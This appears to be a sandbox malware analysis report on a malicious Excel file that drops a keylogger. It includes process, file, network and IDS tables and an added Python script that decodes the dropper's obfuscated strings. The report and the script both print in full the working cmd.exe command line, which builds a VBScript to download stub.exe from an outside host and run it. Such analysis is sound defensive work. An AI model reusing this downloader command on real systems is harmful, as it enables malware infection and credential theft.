| Field | Value |
|---|---|
| File name | malicious.xls |
| Full analysis | https://app.any.run/tasks/1f404c4f-2e01-4e11-babd-77b904508a4e |
| Verdict | Malicious activity |
| Threats | A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. |
| Analysis date | January 18, 2019, 10:42:54 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
| File info | Microsoft Excel 2007+ |
| MD5 | 998C37003B6FE1B3338528CA47068D38 |
| SHA1 | B8F772F71046049E13BC385F1D13A6CC5BD9AC17 |
| SHA256 | 66323CD37F75614124A696CB0CC10CFC755E279FC923DB1BA7F5825B02AA78FF |
| SSDEEP | 384:tHaFEIodeBPJ2cwPr6wKisY3nutbOm2eIa2u:qEIoQBP+P/KisNtbOmYab |
| Extension | Identification | Score |
|---|---|---|
| .xlsm | Excel Microsoft Office Open XML Format document (with Macro) | 50.8 |
| .xlsx | Excel Microsoft Office Open XML Format document | 30 |
| .zip | Open Packaging Conventions container | 15.4 |
| .zip | ZIP compressed archive | 3.5 |
| Field | Value |
|---|---|
| AppVersion | 12 |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| TitlesOfParts | |
| HeadingPairs | |
| ScaleCrop | No |
| DocSecurity | None |
| Application | Microsoft Excel |
| ModifyDate | 2019:01:17 09:13:03Z |
| CreateDate | 2019:01:17 09:07:05Z |
| LastModifiedBy | admin |
| Creator | admin |
| Field | Value |
|---|---|
| ZipFileName | [Content_Types].xml |
| ZipUncompressedSize | 1359 |
| ZipCompressedSize | 389 |
| ZipCRC | 0x66e51af1 |
| ZipModifyDate | 1980:01:01 00:00:00 |
| ZipCompression | Deflated |
| ZipBitFlag | 0x0006 |
| ZipRequiredVersion | 20 |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2796 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
| 3192 | CMd /c cd %TEMP% & @ECHO P0i= "http://www.neeba.in/stub.exe">>Q8m.VBS &@ECHO Y9x = P3a("ymtOfyf")>>Q8m.VBS &@ECHO Set U6m = CreateObject(P3a("ntynmSOynmiuuq"))>>Q8m.VBS &@ECHO U6m.Open P3a("hfu"), P0i, False>>Q8m.VBS &@ECHO U6m.send ("")>>Q8m.VBS &@ECHO Set J5p = CreateObject(P3a("bepecOtusfbn"))>>Q8m.VBS &@ECHO J5p.Open>>Q8m.VBS &@ECHO J5p.Type = 1 >>Q8m.VBS &@eCHo J5p.Write U6m.ResponseBody>>Q8m.VBS &@ECHO J5p.Position = 0 >>Q8m.VBS &@ECHO J5p.SaveToFile Y9x, 2 >>Q8m.VBS &@ECHO J5p.Close>>Q8m.VBS &@ECHO function P3a(T7t) >> Q8m.VBS &@ECHO For W9p = 1 To Len(T7t) >>Q8m.VBS &@ECHO K5w = Mid(T7t, W9p, 1) >>Q8m.VBS &@ECHO K5w = Chr(Asc(K5w)- 33) >>Q8m.VBS &@ECHO R8t = R8t + K5w >> Q8m.VBS &@ECHO Next >>Q8m.VBS &@ECHO P3a = R8t >>Q8m.VBS &@ECHO End Function >>Q8m.VBS & Q8m.VBS &dEl Q8m.VBS & tIMeOUT 13 & XLS.EXE | C:\Windows\system32\CMd.exe | — | EXCEL.EXE |
| 2924 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Q8m.VBS" | C:\Windows\System32\WScript.exe | — | CMd.exe |
| 3088 | tIMeOUT 13 | C:\Windows\system32\timeout.exe | — | CMd.exe |
| 2676 | XLS.EXE | C:\Users\admin\AppData\Local\Temp\XLS.EXE | — | CMd.exe |
| 3948 | "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\WININET.dll",DispatchAPICall 1 | C:\Windows\system32\rundll32.exe | — | XLS.EXE |
| 3168 | C:\Windows\system32\cmd.exe /k systeminfo | C:\Windows\system32\cmd.exe | — | XLS.EXE |
| 3704 | systeminfo | C:\Windows\system32\systeminfo.exe | — | cmd.exe |

| PID | User | Company | Description | Integrity level | Exit code | Version |
|---|---|---|---|---|---|---|
| 2796 | admin | Microsoft Corporation | Microsoft Excel | MEDIUM | 0 | 14.0.6024.1000 |
| 3192 | admin | Microsoft Corporation | Windows Command Processor | MEDIUM | | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2924 | admin | Microsoft Corporation | Microsoft ® Windows Based Script Host | MEDIUM | 0 | 5.8.7600.16385 |
| 3088 | admin | Microsoft Corporation | timeout - pauses command processing | MEDIUM | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2676 | admin | | | MEDIUM | | 1.2.0.1 |
| 3948 | admin | Microsoft Corporation | Windows host process (Rundll32) | LOW | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3168 | admin | Microsoft Corporation | Windows Command Processor | MEDIUM | | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3704 | admin | Microsoft Corporation | Displays system information | MEDIUM | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
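The cmd.exe command line recorded for PID 3192 builds a VBScript downloader in %TEMP% one ECHO at a time, runs it (the default handler for .VBS is WScript.exe, PID 2924), deletes it, waits 13 seconds and launches the payload. Its only obfuscation is the helper P3a, which recovers each string by subtracting 33 from every character code. The following Python is an added example, not part of the ANY.RUN report: it re-implements that decoder, rebuilds the dropped script with the literals decoded, and pulls the download URL, HTTP verb, COM object names and on-disk name out of the command line. The command line is embedded as constructed sample input so the script runs offline; the shift constant is read from the embedded `Chr(Asc(...) - N)` expression rather than assumed, so a variant that changes the constant still decodes.

```python
import re

# Constructed copy of the cmd.exe command line recorded for PID 3192 in the
# process table above; embedded here as sample input so the script runs offline.
CMDLINE = (
    'CMd /c cd %TEMP% & @ECHO P0i= "http://www.neeba.in/stub.exe">>Q8m.VBS '
    '&@ECHO Y9x = P3a("ymtOfyf")>>Q8m.VBS '
    '&@ECHO Set U6m = CreateObject(P3a("ntynmSOynmiuuq"))>>Q8m.VBS '
    '&@ECHO U6m.Open P3a("hfu"), P0i, False>>Q8m.VBS '
    '&@ECHO U6m.send ("")>>Q8m.VBS '
    '&@ECHO Set J5p = CreateObject(P3a("bepecOtusfbn"))>>Q8m.VBS '
    '&@ECHO J5p.Open>>Q8m.VBS &@ECHO J5p.Type = 1 >>Q8m.VBS '
    '&@eCHo J5p.Write U6m.ResponseBody>>Q8m.VBS '
    '&@ECHO J5p.Position = 0 >>Q8m.VBS &@ECHO J5p.SaveToFile Y9x, 2 >>Q8m.VBS '
    '&@ECHO J5p.Close>>Q8m.VBS &@ECHO function P3a(T7t) >> Q8m.VBS '
    '&@ECHO For W9p = 1 To Len(T7t) >>Q8m.VBS '
    '&@ECHO K5w = Mid(T7t, W9p, 1) >>Q8m.VBS '
    '&@ECHO K5w = Chr(Asc(K5w)- 33) >>Q8m.VBS '
    '&@ECHO R8t = R8t + K5w >> Q8m.VBS &@ECHO Next >>Q8m.VBS '
    '&@ECHO P3a = R8t >>Q8m.VBS &@ECHO End Function >>Q8m.VBS '
    '& Q8m.VBS &dEl Q8m.VBS & tIMeOUT 13 & XLS.EXE'
)

ECHO_RE = re.compile(r'@?echo\s+(.*?)\s*>>\s*\S+', re.I)   # one "@ECHO body>>file" fragment
P3A_CALL_RE = re.compile(r'P3a\("([^"]*)"\)')              # P3a("literal") call sites
SHIFT_RE = re.compile(r'Chr\(Asc\(\w+\)\s*-\s*(\d+)\)')    # the Chr(Asc(c) - N) body of P3a


def p3a(s, shift=33):
    """Python equivalent of the VBS helper: every character moves `shift`
    code points down (Chr(Asc(c) - 33) in the original)."""
    return "".join(chr(ord(c) - shift) for c in s)


def recover_shift(cmdline):
    """Read the constant out of the embedded P3a definition instead of
    assuming 33, so a variant with a different constant still decodes."""
    m = SHIFT_RE.search(cmdline)
    return int(m.group(1)) if m else None


def decode_literals(cmdline):
    """Map every obfuscated P3a("...") argument to its plaintext."""
    shift = recover_shift(cmdline)
    return {lit: p3a(lit, shift) for lit in P3A_CALL_RE.findall(cmdline)}


def deobfuscate_script(cmdline):
    """Rebuild the VBScript the batch fragment writes, with every P3a call
    replaced by its decoded string literal."""
    shift = recover_shift(cmdline)
    lines = []
    for part in re.split(r'\s*&\s*', cmdline):
        m = ECHO_RE.match(part)
        if not m:   # skips "cd %TEMP%", "Q8m.VBS", "dEl ...", "tIMeOUT 13", "XLS.EXE"
            continue
        body = P3A_CALL_RE.sub(lambda c: '"%s"' % p3a(c.group(1), shift), m.group(1))
        lines.append(body.strip())
    return lines


def extract_iocs(cmdline):
    """Pull the download URL, HTTP verb, COM objects and on-disk name out of
    the decoded script."""
    shift = recover_shift(cmdline)
    url = re.search(r'"(https?://[^"]+)"', cmdline)
    verb = re.search(r'\.Open\s+P3a\("([^"]*)"\)', cmdline)
    objects = re.findall(r'CreateObject\(P3a\("([^"]*)"\)\)', cmdline)
    # The variable passed to SaveToFile holds the drop name; find its assignment.
    var = re.search(r'SaveToFile\s+(\w+)', cmdline)
    save_as = None
    if var:
        assign = re.search(r'\b%s\s*=\s*P3a\("([^"]*)"\)' % re.escape(var.group(1)), cmdline)
        save_as = p3a(assign.group(1), shift) if assign else None
    return {
        "url": url.group(1) if url else None,
        "http_method": p3a(verb.group(1), shift) if verb else None,
        "com_objects": [p3a(o, shift) for o in objects],
        "save_as": save_as,
    }


if __name__ == "__main__":
    for line in deobfuscate_script(CMDLINE):
        print(line)
    print(extract_iocs(CMDLINE))
```

Decoded, the four literals are XLS.EXE, MSXML2.XMLHTTP, GET and ADODB.STREAM: the script fetches http://www.neeba.in/stub.exe over WinHTTP and writes the response body to XLS.EXE in %TEMP%, which is exactly what the files table shows (WScript.exe writes Temp\XLS.EXE with the same hashes as stub[1].exe in the IE cache) and what the ET POLICY "PE EXE or DLL Windows file download HTTP" alert fired on.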
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2796 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8FE2.tmp.cvr | — | — | — |
| 2676 | XLS.EXE | C:\Users\admin\AppData\Local\Temp\aut5833.tmp | — | — | — |
| 2676 | XLS.EXE | C:\Users\admin\AppData\Local\Temp\uwvmqam | — | — | — |
| 2676 | XLS.EXE | C:\Users\admin\AppData\Local\Temp\aut5853.tmp | — | — | — |
| 2796 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~$malicious.xls | — | — | — |
| 2796 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF64EF4F56B1E07BB6.TMP | — | — | — |
| 3192 | CMd.exe | C:\Users\admin\AppData\Local\Temp\Q8m.VBS | text | F12DF8549A350E3A30F5946D1E669287 | 637BF27280437EE85286F0175A8D97C4796CC3777B5A6DAB5EAB502DE820931C |
| 2676 | XLS.EXE | C:\Users\admin\AppData\Roaming\log\AutoUpdate.exe | executable | 42AD20DF1DDD74B47AA45ED48130AFFF | 0E6F5DC3F0AA4D50083C522636AB09CACCEB01DD813C13CC1FE395A31EBB613A |
| 2924 | WScript.exe | C:\Users\admin\AppData\Local\Temp\XLS.EXE | executable | A1EB94D1CA0704AF51C128F978273E7C | 1CC476A2197B4C20510A12194D238954DF3FBE27A28EA51EB0668DD7C7FD6009 |
| 2924 | WScript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\stub[1].exe | executable | A1EB94D1CA0704AF51C128F978273E7C | 1CC476A2197B4C20510A12194D238954DF3FBE27A28EA51EB0668DD7C7FD6009 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2924 | WScript.exe | GET | 200 | 176.9.40.89:80 | http://www.neeba.in/stub.exe | DE | executable | 805 Kb | suspicious |
2676 | XLS.EXE | GET | 200 | 147.75.40.2:80 | http://icanhazip.com/ | US | text | 14 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2924 | WScript.exe | 176.9.40.89:80 | www.neeba.in | Hetzner Online GmbH | DE | suspicious |
2676 | XLS.EXE | 147.75.40.2:80 | icanhazip.com | Packet Host, Inc. | US | suspicious |
| Domain | IP | Reputation |
|---|---|---|
| www.neeba.in | | suspicious |
| icanhazip.com | | shared |
PID | Process | Class | Message |
---|---|---|---|
2924 | WScript.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2676 | XLS.EXE | Potential Corporate Privacy Violation | ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile |
2676 | XLS.EXE | A Network Trojan was detected | SUSPICIOUS [PTsecurity] Malware Style IP Check |
2676 | XLS.EXE | Attempted Information Leak | ET POLICY IP Check Domain (icanhazip. com in HTTP Host) |